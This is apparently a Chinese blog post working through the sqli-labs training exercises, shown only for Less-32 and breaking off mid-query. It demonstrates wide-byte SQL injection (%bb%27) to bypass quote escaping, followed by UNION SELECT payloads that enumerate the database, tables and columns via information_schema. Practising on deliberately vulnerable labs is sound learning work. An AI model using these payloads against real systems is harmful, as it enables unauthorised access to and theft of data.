前言
继续学习sqli-labs
本篇是less 32-37
Less - 32:GET - Bypass custom filter adding slashes to dangerous chasrs 绕过自定义过滤函数
惯例做测试
发现常见的单引号双引号括号等都没有报错
根据下面的返显是被转义了
这就应该是宽字节注入
尝试下
?id=1%bb%27
显然
可以注入
爆库
?id=-1%bb%27 union select 1,2,database()--+
注入成功
后面就类似了
就注意下字符串用16进制
因为引号被转义了
?id=-1%bb%27 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
?id=-1%bb%27 union select 1,group_concat(column_name),